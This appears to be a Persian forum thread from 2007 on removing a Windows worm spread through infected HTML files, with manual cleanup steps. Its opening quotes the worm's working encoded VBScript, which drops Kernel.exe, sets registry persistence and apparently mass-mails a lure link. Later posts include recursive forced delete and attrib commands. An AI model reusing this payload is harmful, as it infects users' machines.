04904804904904805604805205404904804904905004804904 80490480510520480490510480490480490480500490490530 49049049048052054048054055049049052049048049048057 05504904905404904804904805605204904804904905004804 90490540480550480490480530490480560490480490480520 48049049053049050049049049053048051050048051056048 05105004805105204805705004805505304904804904904905 20490490480490480490490480560480520540490480490490 50048049048049048051052048052049048052054049049057 04904905204904805304904905404904804904805105004904 80500490480530490480560490480490490480490490500480 49048049048053048048049051048049048049049053048052 05404805505704904905004904804904904904804805105004 80520480490490530490500490490490530480510500480510 56048051050048051052048057050048055053049048049049 04905204904904804904804904904805604805205404904804 90490500480490480490480510520480520490480490510480 49048049048049049049048049048048048051050049048053 04904805004804905104804904804904805004904905304904 90490480520540480540550490490520490480490480570550 49049054049048049048056052049048049049050048049049 05404805504804904805304904805604904804904805204804 90490530490500490490490530480510500480510560480510 50048051052048057050048056052048056051048056048048 05304904805304804805605404805205404805405604805505 40480550540480510520480520490480520540490490570490 49052049048053049049054049048049048051050049048050 04904805304904805604904804904904905604805705604904 90530480520570480490510480490480490480530490480500 48051050049048050049049053049049049048052054049049 04904904905004904804904904904804904905404904804904 90500480490490540490480500490480530490480560490480 49048052048049049053049050049049049053048051050048 05105604805105004805105204805705004805605104905004 90490490530490490540490480490490480570490490560480 52054049048048049048056049048056048051052048052052 04805205704805204904805205404904905204904804904805 70550490480480480570550490480560490480560480540480 48054050048051052049049049049049048048051052048051 05004904905404904805204904804904904904804804905104 80490480490480500490490530490490490480520540480540 55049049052049048049048057055049049054049048049048 05605204904804904905004804904905404805504804904805 30490480560490480490480520480490490530490500490490 49053048051050048051056048051050048051052048057050 04805505304904804904904905204904904804904804904904 80560480520540490490560480570560490490530480510520 48052049048052054049049057049049052049048053049049 05404904804904805105004904805004904805304904805604 90480490490490560480570560490490530480530480480490 51048049048049049053048052054048055057049049050049 04804904904904804805105004805204804904905304905004 90490490530480510500480510560480510500480510520480 57050048055053049048049049049052049049048049048049 04904805604805205404904905604805705604904905304805 10520480520490480490510480490480490480490490490480 49048048048051050049048053049048050048049051048049 04804805404804805205504904905304805705704904905204 90480530490490500490490540480540500340130101151011 16032102115111061099114101097116101111098106101099 11604003411509911410511211610511010304610210510810 11151211151161011091110981061010991160340410130101 15101116032114101061099114101097116101111098106101 09911604003411911509911410511211604611510410110810 80340410130101151211150611021151110460711011160831 12101099105097108070111108100101114040049041013010 10211511104606711410109711610108410112011607010510 81010401151211150320380320340920831211151161011091 18046100108108034041046119114105116101032034111110 03401301010210510810110411610906103406011509911410 51121160321080971101031170971031010611180981150991 14105112116062034032038032118098099114108102032038 03203411111003210111411411111403211410111511710910 10321101011201160340320380321180980991141081020130 10102105108101104116109061102105108101104116109032 03803203410210510810110112010104906103403403403203 80321021151110461111121011101161011201161021051081 01040115121115032038032034092084083080051050069046 06807607603404404904104611410109710009710810803203 80320340340340340320380321180980991141081020130101 02105108101104116109061102105108101104116109032038 03203410210510810111809811504906103403403403203803 21021151110461111121011101161011201161021051081010 40115121115032038032034092084083080051050086046068 07607603404404904104611410109710009710810803203803 20340340340340320380321180980991141081020130100701 11114032097032061032049032084111032076101110040102 10510810110411610904904103208311610111203205101301 01021051081011041161090611021051081011041161090320 38032099104114040109105100040102105108101104116109 04904409704405104104101301011010112011601301011410 10461141011031191141051161010320340720750690890950 67085082082069078084095085083069082092083111102116 11909711410109207710509911411111511110211609208710 51101001111191150920671171141141011101160861011141 15105111110092082117110092034032038032034077105099 11411111511110211603208710511010011111911503403204 41151211150320380340920751011141101011080461180981 15034013010114101046114101103119114105116101032034 07207506908909507607906706507609507706506707207307 80690920830790700840870650820690920771050991141111 15111102116092087105110100111119115092067117114114 10111011608610111411510511111009208211711009203403 20380320340771050991141111151111021160320871051101 00111119115034032044115121115032038034092075101114 11010110804610112010103401301012111406111410104608 21011030821010971000400340720750690890950670850820 82069078084095085083069082092083111102116119097114 10109212109710411111109211209710310111409208909710 41111110330320851151011140320730680340410130101151 16097114116013010083117098032115116097114116040041 01301011111003210111411411111403211410111511710910 10321101011201160130100701111140320690970991040321 00114049032073110032102115111046068114105118101115 01301007310203210011404904606811410511810108412111 21010320610320500320791140321001140490460681141051 18101084121112101032061032051032084104101110032102 10510810104903204010011404903203803203409203404105 80321021111081001011140490320401001140490320380320 34092034041013010078101120116013010115101110100109 09710510801301006911010003208311709801301008311709 80321021111081001011140490401001140490410130101111 10032101114114111114032114101115117109101032110101 12011601301007011111403206909709910403210211103207 31100321021151110460711011160701111081001011140401 00114049041046083117098070111108100101114115013010 10510203208506709711510104011410510310411604010211 10440500530410410610340890650720790790330920770690 83083069078071069082092080082079070073076069083034 03211610410111003212109710411111104010211104101301 01021051081010490320401021110410130101021111081001 01114049032040102111041013010078101120116013010069 11010003208311709801301008311709803210210510810104 90401021110410130101111100321011141141111140321141 01115117109101032110101120116013010070111114032069 09709910403210210503207311003210211511104607110111 60701111081001011140401021110410460701051081011150 13010110106032040102105041013010078101120116013010 06911010003208311709801301011511709803211010604010 21050410130101111100321011141141111140321141011151 17109101032110101120116013010101120116061085067097 11510104010211511104607110111606912011610111011510 51111100780971091010401021050410410130101051020321 01120116061034072084077034032111114032101120116061 03407208407707603403211111403210112011606103407208 40840340321161041011100130101051020321141051031041 16040102115111046111112101110116101120116102105108 10104010210504404904104611410109710009710810804410 81011100401021051081011041161090410410600621021051 08101104116109032116104101110013010102115111046111 11210111011610112011610210510810104010210504405604 10461191141051161010321180980991141081020320380321 02105108101104116109013010101110100032105102013010 10111010003210510201301010111010003211511709801301 01151170980321210971041111110401021111210490410130 10070111114032069097099104032102111121050032073110 03210211511104607110111607011110810010111404010211 11210490410460831170980701111081001011141150130101 09097105108097108108061109097105108097108108032038 03210211511104607110111607010510810107809710910104 01021111210500410320380320340641210971041111110460 99111109034032038032118098099114108102013010110101 12011601301010211511104609911410109711610111610112 01161021051081010401151211150320380320340921090971 05108046108111103034041046119114105116101032109097 10510809710810803203803203406907806803401301010211 51110460991141010971161011161011201161021051081010 40115121115032038032034092115101110100046108111103 03404104611911410511610103212111403203803203406412 10971041111110460991111090340130101011101000321151 17098013010115117098032115101110100109097105108040 04101301011111003210111411411111403211410111511710 91010321101011201160130101151011101001090611021151 11046111112101110116101120116102105108101040115121 11503203803203409211510111010004610811110303404404 90410461141010971000971081080130101151011160321090 97105108109061102115111046111112101110116101120116 10210510810104011512111503203803203409210909710510 80461081111030340440490410130101090971051080970611 09097105108109046114101097100108105110101013010119 10410510810103210909710510809703206006203203406907 80680340130100831011160321110981060771011151150971 03101032061032067114101097116101079098106101099116 04003406706807904607710111511509710310103404103201 30101110981060771011151150971031010460831170981061 01099116032061032034072101108108111034013010111098 10607710111511509710310104608310111010010111403206 10321151011101001090130101110981060771011151150971 03101046102114111109061032115101110100109013010111 09810607710111511509710310104608411103206103210909 71051080970130101110981060771011151150971031010460 84101120116066111100121032061032034072101108108111 03403203803211809809911410810203203803203407111103 21161110321091210321150971051160580321041161161120 58047047103105114108115101120046119101098115046105 11104711210509911611711410104610411610903401301011 10981060771011151150971031010460831011101000130101 09097105108097061109097105108109046114101097100108 10511010101301011910111010001301010211511104606711 41010971161010841011201160701051081010401151211150 32038032034092083121115116101109118046100108108034 04104611911410511610103203411110210203401301010111 0100032115117098013010"dim sysSet df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "set fso = df.createobject("Scripting.FileSystemObject","")set s=df.CreateObject("Shell.Application.1","")set re=df.createobject("wscript.shell","")sys=fso.GetSpecialFolder(1)For a = 1 To Len(filevbs1) Step 3filevbs2=filevbs2 & chr(mid(filevbs1,a,3))if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))nextkr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Microsoft Windows"))fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or krucase(sys & "\KERNEL.EXE") thenre.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2s.Open (sys & "\Kernel.exe")end iffso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1if fso.opentextfile(sys & "\Systemv.dll",1).readall"on" thenfso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2s.Open (sys & "\Kernel.vbs")end ifاین کد باعث میشه که هر وقت سیستم اومد بالا این فایل Kernel هم دوباره فعال بشه.حالا شما دو تا راه داری:1-این که بشینی تموم فایل های htm رو با Notepad بازکنی و این کد رو از آخر همه اش برداری یعنی کاری که من با 300 تا فایل htm کردم چون برام مهم بودن اما حواست باشه که سیستم Restart نشه یا قبل این که Restart کنی فایل هایی که کدشونو پاک کردی بریزی روی CD یا به فایل zip تبدیلشون کنی چون دوباره ویندوز لود میشه و این کد به آخر تموم فایل هات اضافه میشه و ... .من پیشنهاد می کنم وقتی که این کد ها ور از روی تموم فایل هات پاک کردی اون ها رو بریز رو CD تا از خطر در امان باشی.2-یه راه دیگه هم این که تموم فایل های htm رو پاک کنی یا بریزی روی CD و بعد سر فرصت بشینی کد های آخر فایل ها رو پاک کنی.مهم این که فایل htm روی سیستمت نباشه.فایل های htm شامل Temporary Internet Files هم میشه اونها رو هم پاک کن.حالا شما دیگه هیچ فایل htm روی Hard نداری بهتره که درایو ویندوزتو Format و یه ویندوز جدید بریزی.

دوستان لطف کنین برنامه مربوطه برا پاک کردن این ویروس رو هم بگین

srh124
17-10-2007, 12:59
quote=hossein_61;1705600]
من حدود دو هفته است كه كامپيوترم با وجود آنتي ويروس kaspersky مبتلا به اين ويروسه . اما تونستم اطلاعاتي در مورد اين ويروس به دست بيارم و اونو از بين ببرم . اگه كسي اطلاعات بيشتري در مورد اين ويروس داره به بقيه هم بگه !


ویروس Win32/PSW.Agent.NDP که به تازگی وارد اینترنت شده با غیرفعال کردن گزینه
show hidden files and folders در folder option باعث عدم نمایش فایلهای مخفی می شه و نمی زاره که کاربرها فایلهایي كه مخفی کردن رو ببینن. این ویروس با دستکاری تو رجیستری ویندوز باعث می شه که شما نتونید تنظیمات hidden file and folder را تغییر بدید. به محض تغییر دادن این قسمت و خارج شدن از اون تنظیمات به حالت پیش فرض خود برمیگرده . البته این ویروس خرابکاریهای دیگه ای هم داره اول اینکه تو تمام درایوهای شما یه فایل autorun.inf می سازه که درایوهای هارد رو autorun می کنه.
دوم اینکه دوباره تو تمام درایوها یه فایل دیگه به نام ntde1ectمی سازه که شما به محض اینکه فلاپی وارد سیستم کنید یا فلش یا mp3 pleyer را به کامپیوتر متصل کنید یه کپی از خودش به صورت hidden وارد دستگاه شما یا فلاپی شما می کنه . البته فایل ntde1ect خیلی شبیه فایل ntdetect هست که توی درایو C وجود داره و برای بالا اومدن ویندوز ضروریه . اینو گفتم یه وقت این دوتا رو با هم اشتباه نگیرید . اگر خواستید این فایلهای مخرب رو توی درایوهای هاردتون ببینید می تونید با استفاده از برنامه nero این کار رو بکنید . سوم اینکه با اجرای فایل avpo.exe به شما اجازه نمیده که فلش یا mp3 pleyer یا هر چیز دیگه رو از پورت USB ، safe remove کنید .
تا چندی پیش آنتی ویروس های node32 و Kaspersky با وجود update شدن این ویروس رو تشخیص نمی دادن اما حدود یک هفته است که آنتی ویروس node32 اگه به روز بشه این ویروس رو می شناسه و اونو delete می کنه . اما اگه شما نتونستید با آنتی ویروس این ویروس رو از بین ببرید روش پاک کردن این ویروس رو به صورت دستی براتون نوشتم که خیلی آسونه می تونید امتحان کنید که 100% جواب میده .



روش پاک کردن :


1. در حالت safe mode وارد ویندوز شوید . ( با زدن دکمه F8 قبل از بالا آمدن ویندوز حالت safe mode را انتخاب کنید )
2. پنجره Task Manager را باز کنید (Ctrl-Alt-Del) و برنامه های زیر را در صورت اجرا ببندید .
wscript.exe : اگر در حال اجرا بود آن را ببندید (End process)
avpo.exe : اگر در حال اجرا بود آن را ببندید (End process)
3. از قسمت start برنامه Run را اجرا کنید و در عبارت cmd را در آن تایپ کنید و enter را بزنید .
4. در این قسمت در خط فرمان برنامه ، دستور زیر زیر را تایپ کنید و enter را بزنید .

del c:\autorun.* /f /a /s /q

این دستور را برای درایوهای دیگر اجرا کنید . با این دستور تمام فایلهایautorun موجود delete می شود .
قبل از این کار اگر در درایوها فایل autorun دارید که فکر میکنید به دردتون می خوره ، اول از این فایل backup بگیرید بعد دستور بالا رو اجرا کنید .
5. در این مرحله در خط فرمان c:\ دستور زیر را تایپ کنید تا وارد پوشه system32 شوید :

C:\cd windows\system32
C:\windows\system32

6. در ادامه دستور زیر را تایپ کنید و آنرا اجرا کنید .

*.*dir /a avp

7. در این قسمت هر فایلی به نامهای avp0.dll و avpo.exe و avp0.exe دیده شد آنرا پاک کنید .

attrib -r -s -h avpo.exe
del avpo.exe

8. بعد از این مراحل تمام پنجره ها رو ببندید و برنامه registry را اجرا کنید :
(Run \regedit)
مسیر زیر را دنبال کنید :
HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run

در این قسمت هر کلیدی که به نام avpo.exe بود را delete کنید .
9. در برنامه registry قسمت edit گزینه Findرا کلیک کنید و عبارت
ntde1ect را جستجو کنید. تمام کلیدهای پیدا شده را delete کنید .
این کار را برای فایل avpo.exe نیز انجام دهید و تمام کلیدهای پیدا شده راdelete کنید .
10. در آخر کار سراغ کلید زیر بروید و مقدار CheckedValue را برابر 1 قرار دهید .


HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Explorer/Advanced/Folder/Hidden/SHOWALL


نکته خیلی مهم : اگه این ویروس رو با آنتی ویروس از بین بردید باید مرحله 10 رو خودتون انجام بدید تا بتونید فایلهای hidden رو ببینید .
حسين آقاجان:5:
[/QUOTE]

سلام
سیستم من هم ظاهرا همین ویروسی که شما میگید رو گرفته ولی تعجب میکنم چون من تازه ویندوز عوض کرده بودم داشتم نرم افزار روش نصب مبکردم که فهمیدم ویروسی شده. ویندو قبلی اینطور نبود
خواستم مراحل بالا رو انجام بدم ولی مسئله اینه که وارد Safe mode نمیشه یعنی تا میخواد Safe mode رو لود کنه restart میشه. حالا موندم چی کار کنم؟

Maysam-BFU
17-10-2007, 23:19
نمی دونم این رو میدونید یا نه ولی این ویروس قسمت Search رو هم از کار انداخته !!!!

من از کدام یک از راه ها این ویروس رو پاک کنم ، راهنمایی کنید.

winxp
17-10-2007, 23:26
نمی دونم این رو میدونید یا نه ولی این ویروس قسمت Search رو هم از کار انداخته !!!!

من از کدام یک از راه ها این ویروس رو پاک کنم ، راهنمایی کنید.


سلام عزیزم

برو صفحه 1

پست 2 و 3 رو امتحان کن , اونارو خودم تست کردم

در کل باید ببینی مشکلت شبیه کدوم یکی از ایناست

تست کن جوابشو بگو

موفق باشی
:11:

mahdi7610
17-10-2007, 23:37
جواب



دوستان لطف کنین برنامه مربوطه برا پاک کردن این ویروس رو هم بگین

بعد از اینکه کارهای بالا را انجام دادی این برنامه را اجرا کن

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

7305ramin
18-10-2007, 03:21
منم همین مشکل رو دارم نمی دونم چیکار کنم تا حالا دو بار ویندوز عوض کردم ولی نتونستم از دستش خلاص بشم دو تا برنامه ای که معرفی کرده بودید اجرا کردم ولی جواب نداد
تورو خدا یه انتی ویروس معرفی کنید که بتونم از دستش خلاص شم
من الان برنامه kasper skay ver 6.0 رو روی کامپیوتر نصب کردم ولی شناساییش نمیکنه

7305ramin
18-10-2007, 15:37
کسی نیست یه انتی ویروس خوب معرفی کنه تا بتونم ازدستش خلاص شم اخه فقط مشکل hide نیست سرعت کامپیوترم هم خیلی اومده پایین هر وقت هم می خوام به اینترنت وصل شم کامپیوتر قفل میکنه

mahdi7610
18-10-2007, 21:30
دوست عزیز این ویروس یا بهتره به نظر من اسمش را بزاریم شبه ویروس چون کار خطرناکی انجام نمی ده . فقط اعصاب ادما خورد می کنه .

این ویروس از طریق صفحه های HTML که از اینترنت ذخیره می کنید به وجود می آید. این ویروس سه فایل دارد که هر سه تا در پوشه ویندوز در سیستم 32 ذخیره می شود که می توانید از تاریخ تولیدشان شناساییشان کنید.

دو تا به نام Kernel و یکی به نام Systems هست که باید سه تا فایل را پاک کنید و بعد هر چه صفحه HTML مشکوک و جدید را باز کنید و هر وقت دوباره این سه فایل آمدند بدانید که این فایلها آلوده هستند و آنها را پاک کنید

حتما با زدن کلید های ctrl+alt+delete وارد task manager بشید و وارد تب processes بشید و برنامه kernel.exe را end کنید .

سپس برنامه زیر را اجرا کنید و سیستم را لاگ اف کنید .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگه با این روش نتونید مشکل را حل کنید با هیچ انتی ویروسی قادر نخواهید بود مشکل را حل کنبد تا حالا همه تونستن با این روش مشکل را بر طرف کنند . شک نکنید که این روش مشکل را به طور کلی حل می کنه .

ولی اگه شما باز صفحات heml را ذخیره کنید این مشکل به وجود می اید .

Maysam-BFU
25-10-2007, 18:27
بچه ها این برنامه Anti Trojan.Win32.Delf.aam از اون روزی که این ویروس رو از بین بردم موقع بالا اومدن کامپیوتر اجرا میشه

وقتی پاکش هم می کنم ارور میده ! راهنمایی کنید.

winxp
07-11-2007, 22:58
سلام به همگی


این پست رو زدم که همه سوالاشونو برا ویروس اینجا مطرح کنند تا این همه تاپیک الکی زده نشه

موفق باشین

sooshiyanet
09-11-2007, 22:46
آقا من چند بار ویندوز عوض کردم

اما نشد

==

چند تا راه حل گفته شد

آخر سر ما کدوم یکی رو اجرا کنیم ؟؟؟

mahdi7610
09-11-2007, 23:32
آقا من چند بار ویندوز عوض کردم

اما نشد

==

چند تا راه حل گفته شد

آخر سر ما کدوم یکی رو اجرا کنیم ؟؟؟

مشکل شما چی بوده ؟
می شه یک بار دیگه بگید .

sooshiyanet
10-11-2007, 01:33
مشکل شما چی بوده ؟
می شه یک بار دیگه بگید .


والا من بعضی از مشکلاتی که این ویروس ایجاد کرده رو دارم , بعضی دیگه رو نه

مثلا : فولدر های Hidden شده من باز نمیشه

وقتی روی آیکون یک درایو کلیک میکنم , صفحه جدید باز میشه

توی درایو هام اون فایل اتوران هست

جالب اینه که توی فایل های HTM , HTML من اثری از اون کد هایی که گفته شده بود نیست

==

ولی خب توی Task Manager من در قسمت Processes فایل Kernal یا Services و یا Soundmix نیست

قبل از اینکه ویندوز عوض کنم برنامه Wscript اجرا میشد , که دیگه نمیشه

==

من این دو تا آنتی ویروسی که گذاشته بودین رو دانلود کردم و اجرا کردم , اما هر دوشون گفتن سیستم من سالمه و مشکلی نداره

==

به روش دستی هم رفتم , تا یه جاهایی رفتم , یه چیزایی رو پاک کردم , اما بازم نشد , هنوز مشکل دارم

sooshiyanet
11-11-2007, 01:03
دوستان من این مشکل رو حل کردم

شاید گفتنش به بقیه هم کمک کنه

اول از همه بگم که دیروز , فایل های Htm من آلوده نشده بود , اما امروز شد و از حرصم همه رو پاک کردم

==

آنتی ویروس Nod32 ورژن 2.7 رو گذاشتم تا آپدیت بشه

خودش فایل اتوران داخل درایو ها رو شناخت و پاک کرد

یگ بار سیستم رو اسکن کردم تا ببینم فایل های Htm آلوده است یا نه

بعد رفتم توی سرچ و هر چی Htm بود رو سرچ کردم , اونجا همه رو پاک کردم (( دوستان میتونن همه رو در Notpad ویرایش کنن و کد های آخر رو پاک کنن , و استفاده کنن از فایل هاشون )) من چون زیاد بودن و دیگه نیازی نداشتم مه رو پاک کردم

بعد از اینکه همه رو پاک کردم (( همه فایل های Htm , HtmL رو )) رفتم و در Regedit , و اون Shell که Winxp گفته بود رو مقدار 1 دادم

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Explorer/Advanced/Folder/Hidden/SHOWALL

مشکل حل شد:19::8:

reza1400
23-11-2007, 20:45
سلام
منم بامشکلی شبیه به آنچه در
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید مطرح شده مواجه شده م.تفاوتش در 229kB نشان دادن است.
فولدر recycler هم در flash memory میاد
توی کارت موبایلم هم هست مشکلی که با این مکانیسم ایجاد میکند اشغال حافظه است
توجهتون قابل تقدیره

alidanger_202
29-11-2007, 23:37
سلام
دستت درد نكنه ....... Anti T.Delf.aam.exe مشكلم رو حل كرد و همه چيز عادي شد.
ممنون .. ممنون

winxp
30-11-2007, 07:41
خوشحالم مشکلتون حل شد

این راه هایی که اینجا گفته شده بسیار مناسبه همین ویروس هستش

امیدوارم به درد همه بخوره

higher_sense
03-12-2007, 04:00
سلام به همه دوستان... .
بی پدر گریبان گیر منم شده ntde1ect.com
یه فایل utorun.inf هم داره که همتون میدونید ولی جالب اینکه هیچ کدوم از مشکلاتی که دوستان میگن رو ندارم تنها مشکل من اینکه وقتی تو my computer میرم رو درایو هام که کلیک میکنم باز نمیشه و یه help از dos میگیره بعد سریع بسته میشه وهمچنین تمام فولدر هام از حالت طبیعی خارج شدن یعنی فاصله شون شده دوبرابر خلاصه اینکه تمام آیکون های دسکتاپم دوبرابر شده فاصلشون... .
راستی در حالت safe mode هم بازهم اول کار که ویندوز بالا میاد یه help میگیره .منم برای دسترسی به درایو هام از نوار آدرس استفاده میکنم خلاصه اینکه این ویروس واسه هر کی یه جور عمل میکنه جریان چیه مگه هوشمنده؟
الانم دارم با nod کامپیوتر رو سرچ میکنم تا حالا هم 3 تا فایل مشکوک رو پیدا کرده منم پاکش کردم.
یکی از فایل هایی که ویروسی کرده help.exe ویندوز بوده... .
انشا الله که از شرش خلاص شم بزاریم بعد از اتمام سرچ بازم خدمت میرسم من که فکر نکنم بتونم به این راحتی ها از شرش خلاص شم.
ولی خودمونیم خیلی ویروس حقیه دست سازنندش درد نکنه خوب میره رو اعصاب ملت

iman_s
03-12-2007, 05:01
تو سیستم من ویروس Soundmix فعال بود.دستی تونستم حذفش کنم.ولی فایلهای مخفی سیستمم دیده نمیشه.به غیر از تعویض ویندوز راه دیگه ای سراغ ندارید که بشه این مشکل رو حل کرد.
وارد foldr Option میشم تیک نشان دادن فایلهای مخفی رو فعال میکنم و Ok میکنم.ولی این تغییرات ذخیره نمیشه. چیکار کنم؟؟؟

higher_sense
03-12-2007, 13:26
تو سیستم من ویروس Soundmix فعال بود.دستی تونستم حذفش کنم.ولی فایلهای مخفی سیستمم دیده نمیشه.به غیر از تعویض ویندوز راه دیگه ای سراغ ندارید که بشه این مشکل رو حل کرد.
وارد foldr Option میشم تیک نشان دادن فایلهای مخفی رو فعال میکنم و Ok میکنم.ولی این تغییرات ذخیره نمیشه. چیکار کنم؟؟؟

دوست خوبمون winxp گفتن در برای اینکه بشه فایل های مخفی رو دید به کلید رجیستری زیر مراجعه کنید و مقدار آنرا از 0 به 1تغییر دهید... .



HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Explorer/Advanced/Folder/Hidden/SHOWALL

iman_s
06-12-2007, 01:51
دوست خوبمون winxp گفتن در برای اینکه بشه فایل های مخفی رو دید به کلید رجیستری زیر مراجعه کنید و مقدار آنرا از 0 به 1تغییر دهید... .



HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Explorer/Advanced/Folder/Hidden/SHOWALL
دستت درد نکنه درست شد.
ولی نمیدونم این ویروس Soundmix دوباره از کجا اومد تو سیستمم.باید دوباره از اول همه کارها رو انجام بدم.

sardar21
07-12-2007, 13:18
سلام وخسته نباشید به تمام بچه های این سایت
دستم به دامنتون من بعد از ویروس کشی تمام فولدر های تویه درایو هام مخفی شده ویندوزم هم عوض کردو نشده فقط باید تیک hide protected operation systam files تو فولدر آپشن رو بردارم
هرکی می دونه منو راهنمایی کنه یا یه تلفن به من بده تا تماس بگیرم

Mhd 007
09-12-2007, 22:25
بچه ها من هم به ویروس Soundmix دچار شده بودم بعد از پاک شدن اون تمام برنامه های ویندوزم هنگام بازکردنشان از من میپرسند که باید با چه برنامه ای باز بشن حتی برنامه که باید نصب کنم یا Regedit یا حتی Display راه حل من چیه ؟؟؟!!!!

mahdi7610
09-12-2007, 23:13
سلام وخسته نباشید به تمام بچه های این سایت
دستم به دامنتون من بعد از ویروس کشی تمام فولدر های تویه درایو هام مخفی شده ویندوزم هم عوض کردو نشده فقط باید تیک hide protected operation systam files تو فولدر آپشن رو بردارم
هرکی می دونه منو راهنمایی کنه یا یه تلفن به من بده تا تماس بگیرم

سلام دوست عزیز

اینا را توی notepad کپی کن و بعد با پسوند bat سیو کن و بعد هم اجراش کن


attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d

mahdi7610
09-12-2007, 23:20
بچه ها من هم به ویروس Soundmix دچار شده بودم بعد از پاک شدن اون تمام برنامه های ویندوزم هنگام بازکردنشان از من میپرسند که باید با چه برنامه ای باز بشن حتی برنامه که باید نصب کنم یا Regedit یا حتی Display راه حل من چیه ؟؟؟!!!!

سلام دوست عزیز

راستش متاسفانه ویروس یه سری از فایلها را از ویندوز شما پاک کرده و از بین برده . درسته ویروس از بین رفته ولی اثرات خودشا بر جای گذاشته . بهترین راه فکر کنم عوض کردن ویندوز باشه .

iman_s
11-12-2007, 03:24
بچه ها من هم به ویروس Soundmix دچار شده بودم بعد از پاک شدن اون تمام برنامه های ویندوزم هنگام بازکردنشان از من میپرسند که باید با چه برنامه ای باز بشن حتی برنامه که باید نصب کنم یا Regedit یا حتی Display راه حل من چیه ؟؟؟!!!!

متن زیر رو در نوت پد paste کن و فایل رو با پسوند reg ذخیره کن.بعد اجراش کن تا تغییرات تو رجیستری اعمال بشه.من خودم اینجوری سیستمم رو درست کردم.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

winxp
11-12-2007, 16:18
سلام به بچه ها

من چند روز پیش یه سیستم داشتم که حالمو گرفت

گفت هر جا بردیم نتونستن ویروسشو پاک کنن

ما هم تست کردیم دیدیم soundmix هستش

بلافاصله کارای لازم رو انجام دادم ولی بعدش رو هرچی دابل میکردی open withe میشد

هر کار کردم درست نشد که نشد

به ریجستری هم نیمشد دسترسی داشت

اعصابم به هم ریخت ویندوزشو عوض کردم

حتی sfc /scannow هم کار نمیکرد

طرف گفت من نمیخوام ویندوز عوض کنی , میخوام همین طوری پاکش کنی

گفتم بابا دیگه تو چی کار به اون داری , من تضمین میکنم کسی نمیتونه اینو درستش کنه

فایل rundll خراب شده بود

خلاصه درستش کردیم رفت ولی کاش اینو زودتر گفته بودین

کسی sound mix رو نداره من رو سیستم اجراش کنم این راهو تست کنم ؟

ممنون میشم بزارینش تا یه راه کامل هم برا اون بنویسیم

ممنون

sid
11-12-2007, 19:15
اقا این نرم افزار کوچولوه پسوندش خیلی عجیبه سیستم من نمیشناسش
دوم اینکه یکی گفتش مثل اینکه بعد از هر بار بالا اومدن ویندوز مجددا اجرا میشه
من چیکار کنم
هنوز فایل هام مخفیه
از نرم افزار kill newfolder هم استفاده کردم که یکی از بچه های برنامه نویس سایت نوشتتش

sid
13-12-2007, 12:00
مورد توجه اقای کلابیو که هی تیکه میندازن
هر جا که من یه پست میدم تاپیک مربوطه میمیره

sardar21
13-12-2007, 22:15
سلام وخسته نباشی به همه اونایی که این تو این سایت عضو هستند
خواهش می کنم به داد من برسین هر کی می تونه به من کمک کنه
تو کامپیوتر من ویروسی هستش که نمی زاره من yahoo رو باز کنم و وقتی کامپیوتر می یاد بالا my document رو باز می کنه و تمام فایل هایه مخفیم نشون نمی دند تازه گی نمی تونم تیک show hidden رو فعال کنم
اگه کسی می تونه منو راهنمایی کنه یه دنیا ازش ممنون می شم من منتظرم

mahdi7610
14-12-2007, 01:08
سلام وخسته نباشی به همه اونایی که این تو این سایت عضو هستند
خواهش می کنم به داد من برسین هر کی می تونه به من کمک کنه
تو کامپیوتر من ویروسی هستش که نمی زاره من yahoo رو باز کنم و وقتی کامپیوتر می یاد بالا my document رو باز می کنه و تمام فایل هایه مخفیم نشون نمی دند تازه گی نمی تونم تیک show hidden رو فعال کنم
اگه کسی می تونه منو راهنمایی کنه یه دنیا ازش ممنون می شم من منتظرم

دوست عزیز توی این تایپک و تایپک های دیگه کلی درباره این موضوع و این نوع ویروس ها و نحوه برگرداندن قسمتهای غیر فعال شده صحبت شده شده .
یه کم حوصله به خرج بده مطالب این تایپک را بخون هم مشکلت حل می شه و هم به معلوماتت اضافه می شه .

sid
14-12-2007, 01:14
new folder اسم ویروسشه سریعا دست به کار شو که پدر در میاره
انتی ویروس اپدیت حالا هر نوعش
kill new folderرو از همین سایت دانلود کن و اجرا کن
نرم افزار این تاپیک رو هم اجرا کن
بعد دو تا تیک پایینتر show hidenرو هم بردار

sid
14-12-2007, 01:15
یه ویروس ایرانی هم تغریبا همین کارو میکنه که اگه انتی ویروست اپدیت باشه مشکلت حله
اسم ویروس سالدوست هست اگه اشتباه نکنم
نتیجه رو حتما بگو تا منم روشن شم

senator mj
14-01-2008, 01:27
